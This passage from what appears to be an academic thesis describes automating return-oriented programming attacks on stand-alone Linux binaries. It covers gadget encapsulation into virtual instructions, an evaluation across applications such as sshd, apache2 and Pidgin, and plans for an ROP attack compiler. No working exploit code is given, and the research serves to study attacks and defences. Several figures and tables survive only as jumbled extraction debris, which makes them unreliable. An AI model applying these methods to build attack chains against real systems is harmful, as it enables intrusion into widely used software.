effect and ensuring deterministic state in CPU registers, stack and memory. As the
registers get clobbered even by a simple data movement, it is very difficult to keep the
state of the system in the registers. Instead we propose a method to maintain the state
in the main memory. This section express the genuine potency of the register transfer
graph and uses it extensively.
As already shown, the data section has constant offsets, and this can be used as a
place to maintain the state of our system. Once we have found the register candidates
set, we consider the gadgets operating on memory operands and register candidates.
Each of this gadget is then encapsulated with gadgets from the RTG to ensure that the
operation performed in the initial gadget, reads input from memory, and writes the
38
4.7. Encapsulation
result back in memory. The RTG provides gadgets such that:
• Read data from memory, by finding the shortest paths from a memory node to
the source and target operand of the gadget being encapsulated.
• Write data to memory, by finding the shortest path from the target operand of
the gadget being encapsulated, to a memory node.
The encapsulation process can provide mechanism to create virtual registers that
reside in the data section. As the used gadgets only clobber the CPU register, and
also reserved addresses in the data section, each use of the encapsulated gadgets will
only modify the value on the virtual registers. Furthermore, the use of encapsulation
requires only one gadget available for each instruction, to encapsulate it to work with
any memory locations. We call the encapsulated gadgets virtual instructions.
In order to illustrate gadget encapsulation, we assume that the attack application is
Pidgin, and that the RTG is already generated, as shown in Figure 4.8. Furthermore
we assume that addition should be performed on two numbers available in the data
section (2 and 3) and stored to another location. Finally we also assume that only one
add gadget is available:
0xb92689782: add %ebp, %ebx; ret;
0xb92689782: add ebp, ebx ret
eax
ebp
mov
esi
mov
ecx
mov [esi,edi,]
edx
mov
eax
mov
ebx
xchg
esp
mov
xchg
mov [ebp,]
edi
mov [ebp,edi,] xchg
al
mov
cl
mov [ebx,]
edx
mov
2
3
Data Segment
Figure 4.8: Initial state
Figures 4.9 shows how operands ebp and ebx are loaded through the use of RTG, by
reading data from memory referenced by eax.
39
Chapter 4. Automatic Return Oriented Programming
0xb92689782: add ebp, ebx ret
eax
ebp
mov
esi
mov
ecx
mov [esi,edi,]
edx
mov
eax
mov
ebx
xchg
esp
mov
xchg
mov [ebp,]
edi
mov [ebp,edi,] xchg
al
mov
cl
mov [ebx,]
edx
mov
2
3
Data Segment
0xb92689782: add ebp, ebx ret
eax
ebp
mov
esi
mov
ecx
mov [esi,edi,]
edx
mov
eax
mov
ebx
xchg
esp
mov
xchg
mov [ebp,]
edi
mov [ebp,edi,] xchg
al
mov
cl
mov [ebx,]
edx
mov
2
3
Data Segment
Figure 4.9: Read from memory to ebp and ebx
Once the data is loaded into the gadget operands, the add gadget can be executed. The
result stored in ebx is then transferred back to memory, using the RTG and referencing
ecx (Figure 4.10).
The product of the encapsulation is the virtual instruction. It is represented as an
interleaved list of gadget addresses and values. This list is consisted of three parts:
addresses of the gadgets corresponding to the edges along the shortest path from
memory node to the source operands of the encapsulated gadget; the address of
the encapsulated gadget; and addresses of gadgets corresponding to edges along the
shortest path from the target operand in the encapsulated gadget to a memory node.
40
4.7. Encapsulation
0xb92689782: add ebp, ebx ret
eax
ebp
mov
esi
mov
ecx
mov [esi,edi,]
edx
mov
eax
mov
ebx
xchg
esp
mov
xchg
mov [ebp,]
edi
mov [ebp,edi,] xchg
al
mov
cl
mov [ebx,]
edx
mov
2
5
3
Data Segment
Figure 4.10: Write the result back to memory
41
5 Evaluation
To evaluate our approach for automating return oriented programming attacks, we
used OpenSUSE Linux 11.4 (x86), having W⊗
X and ASLR enabled. ROP attacks
are usually conducted on vulnerable applications, by taking over the control of a
computer from another host - remote exploitation. Therefore the executables chosen
for the evaluation, are primary popular network applications, available in almost all
Linux distributions. A set of 20 applications is compiled, ranging from 10 KB to 50 MB.
The first investigated metric is the count of register candidates, i.e. the strongly
connected component cardinality (SCCC) of the RTG. The graph available at Figure 5.1
shows that the count of register candidates increases as the size of the binary increases.
It also indicates that many popular 32bit Linux x86 servers and clients already provide
set of at least 3 available registers, in many cases sufficient to build ROP attacks.
cupsd
5yast2
amarok
skype
3.227 x 10KBvlc
acroread
1
8
5.325 x 10KB
5.939 x 100KB
1.228 x 10KB
4.915 x 10KBfirefox
8
Size (b)
master
4.055 x 100KB
1
opera
1.147 x 10KB
2.589 x 1MB
2.143 x 10MB
0
mysqld
7
5.396 x 10MB
6.963 x 10KB
1.987 x 1MB
1.017 x 10MB
82.393 x 10MB
0
smbd
3
4
4.342 x 100KB5.407 x 100KB
avahi
8
3
2
5
7.004 x 1MB
SCCC
pidgin
1.706 x 10MB
dhclient 6
Binary
3
filezillaXorg
1.761 x 1MB
chrome
apache2
8
8
rpcbind
sshd
8
1.049 x 1MB
Binary Section Size
Avai
labl
e x8
6 C
PU R
egis
ters
0
2
4
6
8
●
●
●
●
●
● ●●
●
●
●
●
●
● ● ● ● ● ● ●
104.5 105 105.5 106 106.5 107 107.5
Figure 5.1: Number of CPU candidates increases with the size of the binary
43
Chapter 5. Evaluation
In Figure 5.2, we compare the set of register candidates with the fixed set of registers
(eax, ecx and edx) used in the generation of ROP based kernel rootkits [19]. The results
of our approach show that the set of register candidates changes on different binaries,
making it infeasible to use fixed set of registers candidates to perform automatic
construction of ROP attacks.
Binary SCCC FSR Binary SCCC FSRchrome 8 X yast2 4 ×acroread 8 X sshd 5 ×skype 8 X cupsd 3 ×opera 8 X apache2 3 ×smbd 8 X avahi 3 ×mysqld 8 X amarok 0 ×filezilla 8 X rpcbind 2 ×Xorg 7 X firefox 1 ×dhclient 6 × master 0 ×pidgin 5 × vlc 1 ×
Figure 5.2: Register candidates and feasibility with fixed set of registers
The number of register candidates only suggests that a high number of register candi-
dates, will make the process of gadget chaining feasible. In order to evaluate the level
of automicity of gadget chaining, we evaluate which logical, arithmetic, comparison
and control flow modification gadgets can be encapsulated, as shown on Figure 5.3.
add sub inc dec and or xor not neg jmp test cmp Otheracroread X X X X X X X X X X X X call mul shl
shr rol rorskype X X X X X X X callopera X X X X X X X X X X X X call mul shl
shr rol rorsmbd X X X X X X X X X X X X callmysqld X X X X X X X X X X X X call mul shl
shr rol rorfilezilla X X X X X X X X X X X X callXorg X X X X X X X X X X X calldhclient X X X X X X X X X X X callpidgin X X X X X X X X X X X callyast2 X X X X X X X X X X X call shl shr
rol rorsshd X X X X X X X X X Xcupsd X X X X X X X X X X callapache2 X X X X X X X X X callavahi X X X X X X X X callamarokrpcbind X X Xfirefox X X X Xmaster Xvlc X X
Figure 5.3: Encapsulation on different instructions
The check mark in every cell above indicates that a particular instruction can be
encapsulated into a virtual instruction. The results confirm that almost any binary
above 400 KB can provide sufficient set of virtual instructions to build a ROP attack.
44
6 Conclusion
6.1 Contribution
Return Oriented Programming is an interesting and a crowded research area, where
new techniques are continuously explored to increase the level of sophistication and
automation of computer attacks. Chapter 2 gives an overview on the fundamentals
of the ROP technique, its variations, and provides an in-depth practical example of
a ROP attack. We showed that most of the known defence techniques either do not
provide a full protection against all ROP variations, or are not vastly deployed, leaving
software across different architectures vulnerable against this type of attacks.
Our contribution is developing techniques to automatize the process of creating ROP
attacks within stand-alone binaries on Linux (x86) systems. The related work (Chapter
3) indicates that most of the techniques target shared libraries, or operating systems
kernels, where large number of gadgets are on disposal. We have discussed that this
approach is not applicable on stand-alone binaries in Chapter 4, as a result of the
reduced set of gadgets available in the machine code of the stand-alone executables.
Therefore we proposed methods to automatically generate virtual instructions, by
encapsulating gadgets with extra instructions such that they operate on memory loca-
tion, instead of registers or the stack. We carefully took into consideration each side
effect caused by the use of the available gadgets having single or multiple instructions,
guaranteeing that the generated virtual instructions will handle all potential side-
effects. We have built the encapsulation process using a register transfer graph, used
to analyse the data movements between the CPU registers and the memory, ensure
that the user will be able to read from memory, perform an arbitrary operation and
write the result back to memory. Finally (Chapter 5 we have shown that this approach
is able to encapsulate most of the arithmetic and logic instructions, as well as control
flow and comparison instructions, in most cases sufficient to create a ROP attack.
45
Chapter 6. Conclusion
6.2 Future Work
To give a short insight in the future plans, we classify our ideas in two parts: points
that will be in our focus in the short run, and goals that we aim to investigate in the
long run.
In the short run:
• Currently the system lacks a proper mechanism to provide automatic condi-
tional branching. This is due to the fact that conditional branching is usually
done by exploiting the CF flag, to provide comparison of the type a < b. The
system should be extended to support gadget chaining to perform conditional
jumping and automatic calculation of the jump offsets when virtual instructions
are used.
In the long run:
• While most of the related work concentrates on providing a Turing complete
set of instructions, our approach tries to encapsulate as many operations as
possible, without even considering the Turing completeness. The fact that the
result of this method is providing virtual instructions and virtual registers, it
provides the flexibility to incorporate different models of Turing completeness,
abstracted on the level of virtual instructions. This is especially useful once
particular virtual instruction is not available, since the system can still ensure
Turing completeness by choosing different or less complicated model.
• Being able to provide virtual instructions and virtual registers (located in the
memory), the system is potentially able to implement even virtual stack, and
implement wrappers for simplified function call in the ROP attack.
• Finally the ultimate use case of this work would be creating a compiler able to
create fully automatic ROP attacks for an arbitrary code, written in a dedicated
language. This compiler will ideally use the virtual instructions, registers and
stack, as an assembly abstraction to compile the dedicated language into an
attack payload.
46
Bibliography
[1] H. Shacham, “The geometry of innocent flesh on the bone: return-into-libc
without function calls (on the x86),” in ACM Conference on Computer and Com-
munications Security, pp. 552–561, 2007.
[2] E. Buchanan, R. Roemer, H. Shacham, and S. Savage, “When good instructions
go bad: generalizing return-oriented programming to RISC,” in ACM Conference
on Computer and Communications Security, pp. 27–38, 2008.
[3] T. Kornau, “Return Oriented Programming for the ARM Architecture,” Master’s
thesis, University Ruhr Bochum, December 2009.
[4] A. Francillon, D. Perito, and C. Castelluccia, “Defending embedded systems
against control flow attacks,” in Proceedings of the first ACM workshop on Secure
execution of untrusted code, SecuCode ’09, (New York, NY, USA), pp. 19–26, ACM,
2009.
[5] F. Lindner, “Router exploitation,” tech. rep., Recurity Labs, 2008. http://www.
recurity-labs.com/content/pub/FX_Router_Exploitation.pdf.
[6] S. Checkoway, A. J. Feldman, B. Kantor, J. A. Halderman, E. W. Felten, and
H. Shacham, “Can dres provide long-lasting security? the case of return-oriented
programming and the avc advantage,” in Proceedings of EVT 2009, (Montreal,
Canada), USENIX/ACCURATE, USENIX/ACCURATE, July 2009.
[7] P. Team, “PaX non-executable pages design & implementation,” 2005. http:
//pax.grsecurity.net/docs/noexec.txt.
[8] PaX Team, “PaX address space layout randomization,” 2003. http://pax.grsecurity.
net/docs/aslr.txt.
[9] I. Molnar and A. van de Ven, “New Security Enhancements in Red Hat Enterprise
Linux v.3, update 3,” 2004. http://www.redhat.com/f/pdf/rhel/WHP0006US_
Execshield.pdf.
47
Bibliography
[10] J. Li, Z. Wang, X. Jiang, M. C. Grace, and S. Bahram, “Defeating return-oriented
rootkits with "return-less" kernels,” in EuroSys, pp. 195–208, 2010.
[11] J. Jiang, X. Jia, D. Feng, S. Zhang, and P. Liu, “Hypercrop: a hypervisor-based
countermeasure for return oriented programming,” in Proceedings of the 13th
international conference on Information and communications security, ICICS’11,
(Berlin, Heidelberg), pp. 360–373, Springer-Verlag, 2011.
[12] L. Davi, A.-R. Sadeghi, and M. Winandy, “ROPdefender: a detection tool to defend
against return-oriented programming attacks,” in ASIACCS, pp. 40–51, 2011.
[13] K. Onarlioglu, L. Bilge, A. Lanzi, D. Balzarotti, and E. Kirda, “G-free: defeating
return-oriented programming through gadget-less binaries,” in ACSAC, pp. 49–58,
2010.
[14] M. Abadi, M. Budiu, U. Erlingsson, and J. Ligatti, “Control-flow integrity prin-
ciples, implementations, and applications,” ACM Trans. Inf. Syst. Secur., vol. 13,
pp. 4:1–4:40, Nov. 2009.
[15] T. Bletsch, X. Jiang, and V. Freeh, “Mitigating code-reuse attacks with control-
flow locking,” in Proceedings of the 27th Annual Computer Security Applications
Conference, ACSAC ’11, (New York, NY, USA), pp. 353–362, ACM, 2011.
[16] E. J. Schwartz, T. Avgerinos, and D. Brumley, “Q: Exploit hardening made easy,”
in Proceedings of the USENIX Security Symposium, 2011.
[17] M. Tran, M. Etheridge, T. Bletsch, X. Jiang, V. Freeh, and P. Ning, “On the expres-
siveness of return-into-libc attacks,” in 14th International Symposium on Recent
Advances in Intrusion Detection (RAID 2011), 2011.
[18] T. Dullien, T. Kornau, and R.-P. Weinmann, “A framework for automated
architecture-independent gadget search,” in Proceedings of the 4th USENIX con-
ference on Offensive technologies, WOOT’10, (Berkeley, CA, USA), pp. 1–, USENIX
Association, 2010.
[19] R. Hund, T. Holz, and F. C. Freiling, “Return-oriented rootkits: Bypassing kernel
code integrity protection mechanisms,” in USENIX Security Symposium, pp. 383–
398, 2009.
[20] E. Levy (Aleph One), “Smashing the stack for fun and profit,” tech. rep., Phrack
49, 1996. http://insecure.org/stf/smashstack.html.
[21] Anonymous, “Once upon a free()...,” tech. rep., Phrack 57, 2001.
http://www.phrack.org/archives/57/p57_0x09_Once%20upon%20a%20free()_
by_anonymous%20author.txt.
48
Bibliography
[22] Blexim, “Basic integer overflows,” tech. rep., Phrack 60, 2002. http://www.phrack.
org/archives/60/p60_0x0a_Basic%20Integer%20Overflows_by_blexim.txt.
[23] G. Richarte and R. Quesada, “Advances in format string exploitation,” tech. rep.,
Phrack 59, 2001. http://insecure.org/stf/smashstack.html.
[24] J. P. Anderson, “Computer Security Technology Planning Study,” vol. 2, p. 61,
1972.
[25] J. Dressler, Cases and Materials on Criminal Law. West, fifth ed., 2009.
[26] T. Lopatic, “Vulnerability in NCSA HTTPD 1.3,” tech. rep., 1995.
http://web.archive.org/web/20070901222723/http://www.security-express.
com/archives/bugtraq/1995_1/0403.html.
[27] R. Wojtczuk, “Defeating solar designer’s non-executable stack patch,” tech. rep.,
1998. http://insecure.org/sploits/non-executable.stack.problems.html.
[28] N. Smith, “Smashing the Stack: prevention?,” tech. rep., 1997. http://seclists.org/
bugtraq/1997/Apr/125.
[29] J. McDonald, “Defeating Solaris/SPARC Non-Executable Stack Protection,” tech.
rep., 1999. http://www.thc.org/root/docs/exploit_writing/sol-ne-stack.html.
[30] L. Granquist, “Future of buffer overflows ?,” tech. rep., 2000. http://seclists.org/
bugtraq/2000/Nov/13.
[31] R. Wojtczuk, “The advanced return-into-lib(c) exploits,” tech. rep., Phrack 58,
1998. http://phrack.org/issues.html?issue=58&id=4.
[32] R. Permeh and M. Maiffret, “ANALYSIS: .ida “Code Red” Worm,” tech. rep.,
Phrack 58, 2001. http://www.eeye.com/Resources/Security-Center/Research/
Security-Advisories/AL20010717.
[33] S. Krahmer, “x86-64 buffer overow exploits and the borrowed code chunks ex-
ploitation technique,” tech. rep., SUSE, 2005. http://www.suse.de/~krahmer/
no-nx.pdf.
[34] S. Checkoway, L. Davi, A. Dmitrienko, A.-R. Sadeghi, H. Shacham, and
M. Winandy, “Return-oriented programming without returns,” in ACM Con-
ference on Computer and Communications Security, pp. 559–572, 2010.
[35] T. K. Bletsch, X. Jiang, V. W. Freeh, and Z. Liang, “Jump-oriented programming: a
new class of code-reuse attack,” in ASIACCS, pp. 30–40, 2011.
49
Bibliography
[36] K. Lu, D. Zou, W. Wen, and D. Gao, “Packed, printable, and polymorphic return-
oriented programming,” Management, 2011.
[37] R. Roemer, E. Buchanan, H. Shacham, and S. Savage, “Return-oriented program-
ming: Systems, languages, and applications,” Trans. Info. & Sys. Sec., 2011. To
appear.
[38] Microsoft, “A detailed description of the Data Execution Prevention (DEP) feature
in Windows XP Service Pack 2, Windows XP Tablet PC Edition 2005, and Windows
Server 2003,” 2006. http://support.microsoft.com/kb/875352.
[39] H. Shacham, M. Page, B. Pfaff, E.-J. Goh, N. Modadugu, and D. Boneh, “On the
effectiveness of address-space randomization,” in ACM Conference on Computer
and Communications Security, pp. 298–307, 2004.
[40] P. Barham, B. Dragovic, K. Fraser, S. Hand, T. Harris, A. Ho, R. Neugebauer, I. Pratt,
and A. Warfield, “Xen and the art of virtualization,” SIGOPS Oper. Syst. Rev., vol. 37,
pp. 164–177, Oct. 2003.
[41] N. Nethercote, Dynamic binary analysis and instrumentation. PhD thesis, Uni-
versity of Cambridge, 2004.
[42] M. Frantzen and M. Shuey, “Stackghost: Hardware facilitated stack protection,”
in Proceedings of the 10th conference on USENIX Security Symposium - Volume
10, SSYM’01, (Berkeley, CA, USA), pp. 5–5, USENIX Association, 2001.
[43] U. Erlingsson, S. Valley, M. Abadi, M. Vrable, M. Budiu, and G. C. Necula, “Xfi:
software guards for system address spaces,” in Proceedings of the 7th USENIX
Symposium on Operating Systems Design and Implementation - Volume 7, OSDI
’06, (Berkeley, CA, USA), pp. 6–6, USENIX Association, 2006.
[44] S. Mccamant, “Efficient, verifiable binary sandboxing for a cisc architecture,”
tech. rep., MIT Computer Science and Artificial Intelligence Laboratory, 2005.
[45] F. Mavaddat and B. Parhami, URISC: the Ultimate Reduced Instruction Set Com-
puter. Research report // Faculty of Mathematics, University of Waterloo, Fac. of
Mathematics, Univ., 1987.
50